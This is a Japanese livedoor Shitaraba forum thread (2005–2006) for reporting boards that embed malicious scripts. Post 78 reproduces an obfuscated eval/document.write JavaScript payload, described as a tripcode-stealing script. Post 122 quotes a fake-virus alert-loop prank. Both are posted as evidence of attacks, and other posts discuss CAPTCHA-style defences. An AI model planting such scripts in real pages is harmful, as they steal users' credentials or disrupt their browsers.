したらばTOP ■掲示板に戻る■ 全部 1-100 最新50 | メール | |

スクリプト攻撃板報告スレッド

1★ライブドアしたらばスタッフ★:2005/03/03(木) 12:28:43 ID:zCm4FpEE
現在一部のスレッドにおきまして、掲示板管理者の
設定により、悪質なスクリプトを貼り付けている例が
見受けられます。このような板を発見された場合、
こちらのスレッド或いはjbbs-support@livedoor.net
宛にご連絡下さいますようお願い申し上げます。

※本件に関係の無い書き込みに関しましては一律削除致しますので
宜しくお願い申し上げます。

65名無しさん:2005/04/01(金) 15:23:31 ID:lNXx2GVs
一つの例としてセッション管理には普通クッキーを使うが、クッキーを使用できない
環境(携帯とかね)の対策としてURLの末尾をランダムな数字で構成する方法がある。
そのURLはその場限り(短時間、特定のIPからしか有効でない)と設定すれば、
それは少なくともクッキーによるセッション管理と同程度のアクセス制御機構と
なりえる。

つまりアクセス制御機構か否かはURLだからとかクッキーだからだとか、
SSL使っているかどうかとかの個別なものではないわけ。
システム管理者側の「このデータは不特定多数に公開してはいません」という
意思がアクセスする側に常識的な範囲で伝わるかどうかが、アクセス制御機構か否かを
決める。そしてそれを意図的に回避してアクセスする行為が不正アクセスになる。

66名無しさん:2005/04/02(土) 01:26:09 ID:.XxKrdY2
>>31-33
2chだったら、大騒ぎになるな。これ。
((((((;゚Д゚))))))ガクガクブルブル

67名無しさん:2005/04/06(水) 02:16:15 ID:s6qPGANw
かける派は侮れない

68モリオ:2005/04/06(水) 14:57:59 ID:BHFMNeaM
自分のメールアドレスの非公開は出来ないのですかね?
悪戯されたら、困りますので・・・。^^;

69モリオ:2005/04/06(水) 14:59:45 ID:BHFMNeaM
板違いでした。
スイマセン。m(._.)m

70名無しさん:2005/04/06(水) 23:24:43 ID:XQ9vbkoQ
またかけるがNGワード対策をしている。したらばさんどうにかしてください
http://jbbs.livedoor.jp/computer/20231/

71名無しさん:2005/04/07(木) 01:11:17 ID:XQ9vbkoQ
​の対策ありがとうございました。しかしかけるはまた新しい対策を↑の掲示板でしています。もう↑の掲示板削除してよいのではないでしょうか。

72名無しさん:2005/04/07(木) 01:12:31 ID:XQ9vbkoQ
訂正
の対策→ 上の対策

73名無しさん:2005/04/07(木) 01:31:01 ID:lNXx2GVs
read.cgiの改良はどうなったんだ(ボソ

74名無しさん:2005/04/07(木) 01:54:27 ID:zd5M4x5Y
かける 様への規制の仕方がおもしろいね。
ここまでやるなら、いっそのこと消してしまった方が良いのでは?

75名無しさん:2005/04/16(土) 19:20:48 ID:CJCdiFPc
http://jbbs.livedoor.jp/computer/20920/
何か数秒事に強制更新されていて恐い…

76名無しさん:2005/04/16(土) 20:17:33 ID:.PoyotFQ
メッセージ的に不正アクセスっぽいな。

77名無しさん:2005/04/17(日) 00:25:49 ID:KmRKdeOo
http://jbbs.livedoor.jp/computer/20648/
ここも同じ手口で不正アクセスされてる・・

78名無しさん:2005/04/19(火) 21:28:44 ID:HRzDWO72
http://jbbs.livedoor.jp/computer/17483/第九かける掲示板

<script language="javascript"><!--
function decode(data){result="";for(i=0;i<data.length;i+=2){result+=String.fromCharCode(eval(data.substr(i,2))+32)}return result}
document.write(decode("2883678273808400766578718565716929027465866583678273808402308665820084697780295184827378711470827977357265823579686908252311456584721470767979820845658472148265786879770809101822090911456584721470767979820845658472148265786879770809101716161616092768796785776978841487827384690802287370826577690078657769296002846582716984600200877368847229600216600200726973717284296002166002302815737082657769300209276879678577697884148782738469080228707982770065678473797829600272848480261515707665146873801474801582666683158269666683146771736002007769847279682960028079838460020078657769296002757985757376766982600200846582716984296002846582716984600230020927687967857769788414878273846908022873788085840084898069296002727368686978600200786577692960027779686960020086657685692960027869876002300209276879678577697884148782738469080228737880858400848980692960027273686869786002007865776929600284898069600200866576856929600217600230020927687967857769788414878273846908022873788085840084898069296002727368686978600200786577692960028583698263786577696002008665768569296002021184697780110260023002092768796785776978841487827384690802287378808584008489806929600272736868697860020078657769296002858369826377657376600200866576856929600202118469778011023202118469778011021474806002300209276879678577697884148782738469080228737880858400848980692960027273686869786002007865776929600285836982638065716960020086657685692960027284848026151502118469778011021474801560023002092768796785776978841487827384690802287378808584008489806929600272736868697860020078657769296002858369826380657169637865776960020086657685692960020211846977801102600230020927687967857769788414878273846908022873788085840084898069296002727368686978600200786577692960027573667960020086657685692960020211846977801102600230020927687967857769788414878273846908022873788085840084898069296002727368686978600200786577692960028065838387798268600200866576856929600202118469778011026002300209276879678577697884148782738469080228737880858400848980692960027273686869786002007865776929600280658383877982681860020086657685692960020211846977801102600230020927687967857769788414878273846908022815707982773002092768796785776978841475798575737676698214838566777384080927281583678273808430"));
//--></script>
かけるのトリップ抜きスクリプト。今度は暗号化されています。

79名無しさん:2005/05/08(日) 09:52:22 ID:DZTNRPno
>>78のせいで横スクロールがウザイので書き込みして、横スクロールなくします。

80名無しさん:2005/05/08(日) 09:52:56 ID:DZTNRPno
>>78のせいで横スクロールがウザイので書き込みして、横スクロールなくします。

81名無しさん:2005/05/08(日) 09:53:42 ID:DZTNRPno
>>78のせいで横スクロールがウザイので書き込みして、横スクロールなくします。

82名無しさん:2005/05/08(日) 09:54:22 ID:DZTNRPno
>>78のせいで横スクロールがウザイので書き込みして、横スクロールなくします。
あと4回!

83名無しさん:2005/05/08(日) 09:55:00 ID:DZTNRPno
>>78のせいで横スクロールがウザイので書き込みして、横スクロールなくします。
あと3回!

84名無しさん:2005/05/08(日) 09:55:35 ID:DZTNRPno
>>78のせいで横スクロールがウザイので書き込みして、横スクロールなくします。
あと2回!

85名無しさん:2005/05/08(日) 09:56:20 ID:DZTNRPno
>>78のせいで横スクロールがウザイので書き込みして、横スクロールなくします。
あと1回!

86名無しさん:2005/05/08(日) 09:56:53 ID:DZTNRPno
お騒がせしました。

87名前を言えない初心者:2005/05/10(火) 19:16:48 ID:ipxiXSV6
こんにちは!!皆さん
早速ですが、「NGワード」とはなんですか?
たまにそれで、書きこみができなくなります
お願いします!!

88名無しさん:2005/05/10(火) 19:33:54 ID:WGywJRqM
こんにちは!!名前を言えない初心者さん
「NGワード」とは書き込んではいけない言葉のことだよ!
各掲示板の管理人がNGワードを指定しているんだ!

それと思いっきりスレ違いだよ!
このレス読み終わったら氏んでね!

89名前を言えない初心者:2005/05/11(水) 16:36:41 ID:mQKzHOyk
あっほんとだ!!・・・・・・・・・・
でも、親切に教えてくれてありがとうございます
スミマセンでした!
「これから気おつけます」

90名前を言えない初心者:2005/05/11(水) 16:38:57 ID:mQKzHOyk
あっほんとだ!!・・・・・・・・・・
でも、親切に教えてくれてありがとうございます
これから気おつけます「スミマセンでした!」

91名前を言えない初心者:2005/05/11(水) 16:40:33 ID:mQKzHOyk
あれ、まちがって2回書いてしまいました
ほんとうにすみません

92名無しさん:2005/05/11(水) 18:28:57 ID:Ttm8XBnE
オンラインMMORGO、Ragnarok ON Line(以下、ROと略します)系の板なのですが、
どうやら、ゲームで使用する規約違反のツールに
ゲーム内のデータを自動的に掲示板に書き込んで荒らしを行う罠を仕込んでいるらしく
大量の書き込みで掲示板としての機能がなさなくなってしまっています。

たとえば
http://jbbs.livedoor.jp/bbs/read.cgi/computer/6135/1115674068/
http://jbbs.livedoor.jp/bbs/read.cgi/computer/6135/1115669899/
http://jbbs.livedoor.jp/bbs/read.cgi/computer/6135/1115799896/
この様にスレッドを立てておくとどんどんレスをうめて行き、
もはや掲示板として機能しません。
この掲示板のほか、複数の板で同様の被害が出てる模様です。

なんとかならないものでしょうか・・・?

93名無しさん:2005/05/11(水) 22:16:27 ID:/b1dxJFU
>>92
スクリプト荒らしか。

94名無しさん:2005/05/11(水) 23:27:14 ID:4KTAGPCs
>>92
そもそも「被害にあった掲示板」の管理人はどう考えてんのさ?管理人が特に何も行動を起こそうと思わないなら、
それでいいんじゃないの?というかそれって管理人の意図に反してるのかも不明だし。

ともかくあんたの短い説明だけじゃ詳細が分からないし、あんたの示したリンク先でそういう問題を話し合ってるようにも見えない。
したらばに何か要望する段階ではない気がするけどね。まずは有志で問題の整理から始めることですな。

95名無しさん:2005/05/11(水) 23:28:29 ID:4KTAGPCs
それともここしばらくしたらばが異常に重いのは、このせいとか?

96名無しさん:2005/05/12(木) 00:18:34 ID:bkgPGqmw
>>94
被害にあった掲示板の管理人は放置してますね。掲示板自体の。
そこを利用してる身としては管理人になんとかしてもらえるならば
それに越したことはないのですが、このスクリプト荒らしを行う罠というものが、
複数の掲示板に対し全自動でスクリプト荒らしを行うため
結果としてしたらばJBBS自体への迷惑になると考え、報告した次第です。

話し合いをしようにも次々書き込まれるので話しようがないのですよ。

なお、この罠を仕込まれたプログラム自体がオンラインゲームのキャラを全自動で動かし、
Lv上げ・アイテム稼ぎを行わせるという代物なので
(ゲーム管理会社は当然規約で使用を禁止してますが)、
罠仕込みのプログラムを使用している当人も恐らくは気づいていないか、
気づいていても放置しているかのいずれかと思われます。

97名無しさん:2005/05/12(木) 04:23:07 ID:4KTAGPCs
>>96
> 話し合いをしようにも次々書き込まれるので話しようがないのですよ。

そのための議論用の掲示板を新たに立ち上げるなり、別な掲示板を暫定的に使うなりすればいいんじゃないの?

> 罠仕込みのプログラムを使用している当人も恐らくは気づいていないか、
> 気づいていても放置しているかのいずれかと思われます。

そのツールの配布元とかその作者がどういう意図でやってるのかとか、
そもそもこれってその掲示板の管理人とツールの作者が連んでいるんじゃないのかとか、
明らかにしなくてはならないことは無数にあると思うけど?

あんたカキコは第一報としての価値あるかも知れないが、それだけでは恐らく何も進展しないと思うよ。

98名無しさん:2005/05/12(木) 04:35:49 ID:4KTAGPCs
で、やっぱネットワークに詳しい人間が誰か立ち上がるしかないと思う。
ROをプレイしていて、アングラなツールにもそれなりに詳しく、なおかつネットワークの知識がある人。
ネットワークの知識があればPCが送信しているTCPのパケットをすべてモニターすることができるから、
どのツールを動かしているときにそれが行われるか特定できるはず。

で、ツールを特定したら、そのツールを使わないように呼びかけるとか、あるいはそのツールがアップされている
サイトの運営会社に削除依頼を出すとかになるだろう。もし一介のユーザーではそのサイトの運営会社が
聞き入れてくれない場合、はじめてしたらばの出番になるように思う。

まっとうなところではなくWinnyとかに流されているツールだと根絶するのは難しいだろうね。
なんにせよツールの特定からですな。

99名無しさん:2005/05/12(木) 04:46:12 ID:4KTAGPCs
あと、これってあるいはアンチウィルスメーカーの方に「こんなことがあるらしい」とメールを出してみたらどうだろう。
何とも言えないが、サイト攻撃をするプログラムなら、そっちの方面の領分かもしれない。

100名無しさん:2005/05/17(火) 05:14:20 ID:fgmKhhNU
>>99
きみっていつみても独り言が多いね。友達いないの?

101名無しさん:2005/05/18(水) 10:12:06 ID:4KTAGPCs
>>100
自分のうっぷん晴らしのためにスレに落書きしているような人間に言われたくはないねえ。

102名無しさん:2005/06/11(土) 15:36:03 ID:SA1F0x2Q
<jbbs fontsize="+5n">おおお

103名無しさん:2005/06/11(土) 15:40:21 ID:SA1F0x2Q
<FONT SIZE="5>h

104名無しさん:2005/06/11(土) 15:42:26 ID:SA1F0x2Q
<font size="7"> こここ </font>

105名無しさん:2005/06/11(土) 15:42:58 ID:SA1F0x2Q
<font size="7">こここ</font>

106名無しさん:2005/06/21(火) 05:02:59 ID:wwe0oyp2


107名無しさん:2005/06/22(水) 23:52:25 ID:QOxXgopg
http://jbbs.livedoor.jp/game/19720/
荒らされています、対処をお願いします

108名無しさん:2005/06/23(木) 07:01:28 ID:hVkHPi/6
>>107
そこの管理人ですが、対処しました。

109タン:2005/06/25(土) 03:12:38 ID:dfYEy4RY
自分の管理している掲示板が
違うIPからのスレッド乱立スクリプト攻撃を受けているんですが。
10分もたたないうちに200近くのスレッドをたてられてしまいます
何か対処法はありますか?

110名無しさん:2005/06/25(土) 03:37:08 ID:eZfi9rxE
>>109
うちの板も同じです。「ここって」というスレタイだと思いますが、かなり困ります。

111名無しさん:2005/06/25(土) 14:40:35 ID:NlLMdQQ.
>>109
>>109
スレッド数制限が良いですよ
予め必要なスレッドを立てておいて不要なスレッドは一つも立てられないようにするというのはどうでしょうか?

112名無しさん:2005/06/27(月) 18:25:57 ID:scMeHhFk
>>111
そもそも自由に立てられるようにしているのに、わざわざ立てられないようにするなら
ハンドルパスを設定して立ててもらった方がスマートだと思いますが?

113名無しさん:2005/06/27(月) 18:37:46 ID:yKg9eCVo
ハンドルパスワードとは別に、その掲示板に対する「スレ立て」用のパスワードを設定できるといいかもね。
そのパスワードは非公開じゃなくて、その掲示板を読んでいる人間なら分かるように「公開」しておく。

つまり「人間」ならば誰でもそのパスワードが分かり、スレ立てできる。
しかしスクリプトではできない、って形。

まあ最終的には画像認証方式とか導入してもらえるといいかもね。
スレ立て画面に人間にしか読めない文字で文字列を表示して、これをそのまま打ち込んでください、ってやつ。

欠点として2chブラウザからスレ立てが出来なくなるけど、スレ立てぐらいなら2chブラウザからできなくても我慢できる。

114名無しさん:2005/06/27(月) 18:39:59 ID:yKg9eCVo
ちなみにこういうやつね
http://search.msn.com/docs/submit.aspx?FORM=WSDD2

115名無しさん:2005/07/17(日) 20:18:28 ID:TkMNPJ8A
http://jbbs.livedoor.jp/game/16177/
上記(↑)の掲示板にスクリプトが設置されています。

116名無しさん:2005/08/12(金) 09:01:18 ID:TbshHQ2U
>>3

117ATK:2005/08/19(金) 17:35:19 ID:Rhc.9TGM
>>115のサイトの対策をなにもしないしたらばさんって・・・

118Casshern ◆LRPF7SjBag:2005/10/08(土) 22:30:05 ID:GQHYrVxY
http://jbbs.livedoor.jp/comic/1850/

入った途端に あなたはウイルスに感染されました。 だって

119名無しさん:2005/10/09(日) 22:03:46 ID:U7qy2d66
>>118
OpenJaneで見れば問題なし。

120Casshern ◆LRPF7SjBag:2005/10/10(月) 21:55:55 ID:GQHYrVxY
>>119
いやwwそこまでして入りたいってわけではなくwww
まぁ、一応報告です、、、

121名無しさん:2005/12/03(土) 16:14:48 ID:E4ROBgOs
すいませんがパスワードかけてるだけです↓↓
ツール使って破ってくるやつがいるんでそれようの対策です・・・
⇒辞書アタック式のツールです

122名無しさん:2005/12/13(火) 22:13:48 ID:.qr4ejAc
>>118-121

<script language="Javascript">\n<!--var pass;\npass=prompt("最初の関門","BONPと言えば?(半角入力)")\n
if(pass=="jirojirojiro")\n{\n document.all('nagao').style.visibility='visible'\n}else\n{\n
for(i=1;i<=200;i++)\n {\n window.alert("残念ながらウイルスに感染しました");\n }\n
window.alert("最後のボタンを押すと死にます");\n}\n//-->\n</script>\n

パスワードは「jirojirojiro」だそうです

123名無しさん:2005/12/17(土) 16:07:05 ID:cWrXkg0A
>>122設置したくなって来たぉ(^ω^ )

124名無しさん:2005/12/17(土) 16:07:04 ID:cWrXkg0A
>>122設置したくなって来たぉ(^ω^ )

125名無しさん:2005/12/30(金) 17:23:08 ID:s8YjnH/c
>>122エンターずっと押せば解除できるわけ

126名無しさん:2006/06/14(水) 18:48:25 ID:QS5idYBU
http://jbbs.livedoor.jp/computer/22654/
ブラクラ並にウインドウが開きます。

127名無しさん:2006/06/19(月) 17:22:13 ID:AHe5epao
>>126キーボードかマウスがおかしいのでは

128名無しさん:2006/06/19(月) 19:44:59 ID:QS5idYBU
>>127
いや、おかしくないと思いますよ。
今やってもまたブラクラ並に開きましたし。

129名無しさん:2006/06/19(月) 19:54:20 ID:QS5idYBU
どうやら確信犯のようです。かなり悪質なので止めちゃって下さい。お願いします。
http://jbbs.livedoor.jp/bbs/read.cgi/computer/26567/1149679576/

130名無しさん:2006/06/19(月) 19:55:16 ID:QS5idYBU
>>129の内容
1 名前:名無しさん@お腹いっぱい 投稿日: 2006/06/07(水) 20:26:16 [ qT1bdze. ]
おい糞管理人wwwwwwww
逆に板に入りにくくしてどうすんの?wwww
自分から誰も来なくしてんじゃんwwwwwww
まあそのほうが正しいから続行しなよwwwwwww
これでここは廃墟と化すなwwwwwwww
書き込むのが面倒になったからもう書き込まなくていいよみんなwwwwwwwwwww

131名無しさん:2006/06/19(月) 19:56:08 ID:QS5idYBU
>>130の続き
2 名前:管理人★ 投稿日: 2006/06/10(土) 07:18:00 [ smmGScNw ]
>>1
JavaScriptをOffにすれば良いだけの話

132名無しさん:2006/06/19(月) 19:59:37 ID:QS5idYBU
というか、書き込める量が少なすぎ。
もっと増やさないとかなりきついと思われ。

133名無しさん:2006/06/19(月) 20:01:58 ID:QS5idYBU
それと、何日も経ってもIDが変わらないのはどうかと思う。

134須賀 ◆GmgU93SCyE:2006/06/27(火) 21:48:23 ID:x.SQNF4k
>>132
4096ってたりないかなぁ?
>>133
管理メニューのIDタイプで変更できますが。

135名無しさん:2006/06/27(火) 23:50:28 ID:QS5idYBU
どうやら確信犯のようです。かなり悪質なので止めちゃって下さい。お願いします。
http://jbbs.livedoor.jp/bbs/read.cgi/computer/26567/1149679576/
1 名前:名無しさん@お腹いっぱい 投稿日: 2006/06/07(水) 20:26:16 [ qT1bdze. ]
おい糞管理人wwwwwwww
逆に板に入りにくくしてどうすんの?wwww
自分から誰も来なくしてんじゃんwwwwwww
まあそのほうが正しいから続行しなよwwwwwww
これでここは廃墟と化すなwwwwwwww
書き込むのが面倒になったからもう書き込まなくていいよみんなwwwwwwwwwww
てst

136名無しさん:2006/06/27(火) 23:54:37 ID:QS5idYBU
>>134
きついのは行数制限でした。

あと、出来ればこの板のIDも日替わりに変えて欲しいんだけど・・・。

137須賀 ◆GmgU93SCyE:2006/06/28(水) 01:23:37 ID:x.SQNF4k
あぁ。
確かに30までというのはきついな

138名無しさん:2006/06/28(水) 13:17:21 ID:QS5idYBU









10てst

139名無しさん:2006/06/28(水) 13:18:09 ID:QS5idYBU
10行までしか書けない件

140名無しさん:2006/06/28(水) 13:18:44 ID:QS5idYBU
10行までしか書けない件

141名無しさん:2006/06/28(水) 13:19:38 ID:QS5idYBU
2重カキコスマソorz

142過ち:過ち
過ち

143過ち:過ち
過ち

144過ち:過ち
過ち

145過ち:過ち
過ち

146過ち:過ち
過ち

147過ち:過ち
過ち

148名無しさん:2006/09/26(火) 20:31:25 ID:KYo03glE
おまんこまんこ

149名無しさん:2006/10/02(月) 22:51:19 ID:rprXV7wk
過ちって削除された跡なんですね・・・

150過ち:2006/10/16(月) 20:45:16 ID:.rRA0vc6
過ち

151過ち:2006/11/02(木) 19:38:32 ID:8Q9Bxq1w
過ち

152過信:2006/11/04(土) 22:04:34 ID:Q4.3DxTA
過信

153過ち:2006/11/14(火) 01:14:24 ID:pTNMiyXk
過ち

154謝れ:2006/11/14(火) 07:05:25 ID:HI9evm92
謝れ

155謝罪:2006/11/20(月) 14:22:43 ID:YZ3npwJ6
謝罪

156この流れ面白いw:2006/11/20(月) 17:10:20 ID:Oo92BFXc
この流れ面白いw

157↑削除:2006/11/21(火) 21:00:03 ID:4S2s1sDk
↑削除

158糞スレ:2006/11/24(金) 00:16:37 ID:aF6JUDL.
糞スレ

159終了:2006/11/26(日) 20:19:59 ID:qlYbr.pg
終了

160復活:2006/11/29(水) 22:06:46 ID:YnkbujvQ
復活

161名無しさん:2006/12/17(日) 18:14:53 ID:p0iFsWpA
コピペ荒らし報告は駄目でしょうか

162うーん:2006/12/19(火) 21:58:44 ID:6YRYSwrs
削除してアク禁にすればいいかと

163名無しさん:2006/12/26(火) 01:25:02 ID:vr7oqz0s
398 名前:名無しさん 投稿日: 2006/12/20(水) 00:29:16
Anchunに話を収める意識なし。自分が荒らししてるのを正当化中。
前スレでカレーと指摘されて、強力な荒らしをしたことを無かったようにしてる。
コイツに荒らしやめろと言うだけ無駄なのかもしれない。
言っても、粘着してるに話を摩り替えられる。
もう、カレー=Anchunと固定して、Rolex一味の話に戻した方が
板自体の混乱がなくなるのかもしれない。

164晒し:2006/12/26(火) 01:25:52 ID:vr7oqz0s
ttp://jbbs.livedoor.jp/game/21862/


新着レスの表示


名前: E-mail(省略可)

※書き込む際の注意事項はこちら

※画像アップローダーはこちら

(画像を表示できるのは「画像リンクのサムネイル表示」がオンの掲示板に限ります)

掲示板管理者へ連絡 無料レンタル掲示板